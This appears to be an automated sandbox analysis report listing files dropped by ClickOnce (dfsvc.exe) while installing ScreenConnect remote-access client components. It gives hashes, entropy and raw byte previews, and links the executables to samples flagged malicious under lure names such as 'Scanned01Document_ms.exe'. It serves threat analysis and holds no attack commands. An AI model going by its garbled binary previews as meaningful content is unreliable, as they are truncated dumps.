                                                                                                                                                                                                                                                                  SHA1:D06E37356BD4AE50056FC650550A3CFE5F9E41B3
                                                                                                                                                                                                                                                                  SHA-256:0DBEB7DAA0C7F70D594F5CF294D3C3EB88E4C0F25D7174077F511C43F4D90A41
                                                                                                                                                                                                                                                                  SHA-512:921BD5BD362F5CF609D43230270789516BBA10911D0E4EB56FB2A6E3A59B5AB365F2E4C2EEC10250836C6DB64B63584AB5DBF357CF23AA300176D7A09EC63C4A
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:PcmH..........?v...#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...................................................................................................................................................................................................nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1216
                                                                                                                                                                                                                                                                  Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                                  MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                                  SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                                  SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                                  SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):5260
                                                                                                                                                                                                                                                                  Entropy (8bit):4.212169089585271
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:2Nq6R84TeV+Ww7mk9O43jYHlIgBXlnzkay3mhhwnjIbm:iR84UJC9tUHlXBXtIESjd
                                                                                                                                                                                                                                                                  MD5:877C9052B118D2F154A633D3F00759FF
                                                                                                                                                                                                                                                                  SHA1:2A005EADA6B9C8B8CB033FB95BB01316BFF08787
                                                                                                                                                                                                                                                                  SHA-256:571BF9FBFD2000F7B051A93B5B5724E53B4E1D58273D5699AE0D711AAC892F11
                                                                                                                                                                                                                                                                  SHA-512:1C714509A457D494CA5068093E379722877F5CCC1CE9484EE4FA9AC080A0A34976614932D782FE3DE9A553B6B79287095658AD1F46F09CBF47BEE4DC213B3FA2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:PcmH...........C..ws4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........3..L.G.....[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u"...F.....Ey%.....E..X.(...s".I...R)....+.`...m,......;../............... ...#...&...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........l...@.......................................(........... .......(...(...<.......d.......l.......|...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(...............d...........p.......................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1982
                                                                                                                                                                                                                                                                  Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                                  MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                                  SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                                  SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                                  SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):6588
                                                                                                                                                                                                                                                                  Entropy (8bit):4.114943993628971
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:ZMmx9eV+WwwU8WpZ2LRheuMl2UfdVaMsoksJqi/D5:dxCJwpZ2LRhyl5dVzGw75
                                                                                                                                                                                                                                                                  MD5:7AD30FB645AAC6571566C4504E71C836
                                                                                                                                                                                                                                                                  SHA1:67666FB4A2B78262A6721B8491A7F1AA1CDC0208
                                                                                                                                                                                                                                                                  SHA-256:ED5B7DC7B05F91743B32CCE803C805751FF22E3C039E776FDF3E70E5130E6106
                                                                                                                                                                                                                                                                  SHA-512:0195CA68931AC579A94EF694EB342E20F12FD982CDFF6AFC0D7F6486EA49B78FA57F2D5ACDD89F3F5C2B35F1603A22C1C4AB0C11CC2829931EA8239BE34492FB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:PcmH..........j..w@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.........}'.d................z..w.....[~31.X....y..&..d......B(.........C....."...^.ie...u%...[s.T..<(...s".I...R)...F.....Ey,.....E..X./...f..VC..2...O.&r..Vz5......;..8.....V....X;........... ...#...&...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...X...........@........................... .......0...(...8.......`.......h.......x...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(.......................(...$.......L.......T...(...l...................(.......................(...................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2573
                                                                                                                                                                                                                                                                  Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                                  MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                                  SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                                  SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                                  SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3032
                                                                                                                                                                                                                                                                  Entropy (8bit):4.873270947085789
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:0RMQScRgFe6S+9oww7g47BI7EuqSGzhvVDvxLi0nwbb:aXScEeV+Wwwni7npGjD5LvnEb
                                                                                                                                                                                                                                                                  MD5:9B7AF32FAFD09158C2C0A3D44898AB68
                                                                                                                                                                                                                                                                  SHA1:ED56F417ACC794E55BD9B8424D7D49A0FB9006D4
                                                                                                                                                                                                                                                                  SHA-256:957A8647E1C2388DD78F4D50AA091EF26FC22B19FB70BB66C48AE0ADAB1D1264
                                                                                                                                                                                                                                                                  SHA-512:E1D66F81DDFE70549464E87FFA5E71CB455D206708F7ADA11CE4C2B1245D2AD1CFE184B6BAA6E687B2818A8601BBA597295A49BEDE3BDB35929E42A8B6EF7BA6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:PcmH............H.............T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...............................................................................................................................................................nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............<...........MdSp ...$....... ...".............Bi urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1041
                                                                                                                                                                                                                                                                  Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                                  MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                                  SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                                  SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                                  SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):14612
                                                                                                                                                                                                                                                                  Entropy (8bit):5.714277081748387
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:LWh4+In9q5s6VHoY8s8oXN8s8oTN2x2QPIlFDLhEDh7BqWoDOs:LWA9qS6VTX9dX9R/QPIBM7YDb
                                                                                                                                                                                                                                                                  MD5:60A0F82E8B95175C12A8EEBEBBE27DBF
                                                                                                                                                                                                                                                                  SHA1:990A96ECDA8822D577E5283DF95FC0A9AD38B2A3
                                                                                                                                                                                                                                                                  SHA-256:FC28D6A4B187E635B7438C2CE9CB64257FC8D843187AAF76E015F1DB453F4100
                                                                                                                                                                                                                                                                  SHA-512:66CEF0946F25E515811844734A1B51079ED55D430715F982DE8BEC9A7FEA839FF6758D91AD3CF49AA6A53EF467CCF72CDD13788E82E7F0DE0238B1D784FECE17
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:PcmH........~..x.I.$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........3..L.G..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......@8......H8......P8......p8......t8..L...|8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%....]...Tk....Y?.Om.._.............-........................E......................................4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.10.8991........................
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):117980
                                                                                                                                                                                                                                                                  Entropy (8bit):5.585720273564656
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:0aNIcT51/FXvMVNWfCXq9ymSm2o9HuzhJOvP:0FcfiVI8mt8vOvP
                                                                                                                                                                                                                                                                  MD5:4E152D84C20AB6330FF0CF47A9AF7C6D
                                                                                                                                                                                                                                                                  SHA1:018F32D833124056FCCFC200318542687D0E5565
                                                                                                                                                                                                                                                                  SHA-256:5668723C31F6726947DFEDA324B26D27F7E899647C22A4B1B2BEA935BA8A6B10
                                                                                                                                                                                                                                                                  SHA-512:2F3F6B397072B795C74C44F19012483E2785DDEE5A7F5D7E38C566EBC9A94AE084504061F697DB714B933B79824CBC6B08B7718536A19FA21D11AD8D0F8AFB79
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4428
                                                                                                                                                                                                                                                                  Entropy (8bit):4.172510408991975
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:hQKXCD5v+dgre6S+9ow87gFW75uv6ThVBHJu2/qcU5jUWkoDprOaJCf:hvXUeV+Ww8U45u0xpu6UuWkoNOrf
                                                                                                                                                                                                                                                                  MD5:9BB6FC7B18D50BB8F732022157E06F84
                                                                                                                                                                                                                                                                  SHA1:926C999AE5C6CD4D75DEFA1A1B601AFE3B10D9A8
                                                                                                                                                                                                                                                                  SHA-256:EB07B32D7EFB09887D40828FE8F09B387107199CFA9CE1C3F6A9E5A093BCE2C3
                                                                                                                                                                                                                                                                  SHA-512:5DB7E89404E35E101556B4C31879F36AFBF103ECEFC0901A5DF34D2BEBE0363C488EB49EF9E046A6456C254B688EF1238B7C377E12C376E4E9D5C66E40FE2B0D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:PcmH.........H...30_,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........3..L.G........6...................z..w.....[~31.X....y..&..d......B(.........[s.T..<....s".I...R......E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(...............................(................... ...(...4.......\.......d...(...|...................(...............L...........0...................................................................................................................................................................................................................................................................................................nameScreenConnect.Cl
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1636
                                                                                                                                                                                                                                                                  Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                                  MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                                  SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                                  SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                                  SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):95520
                                                                                                                                                                                                                                                                  Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                                  MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                  SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                                  SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                                  SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                  • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: statments.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: sstatment.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):61216
                                                                                                                                                                                                                                                                  Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                                  MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                                  SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                                  SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                                  SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                                                  • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: statments.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: sstatment.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
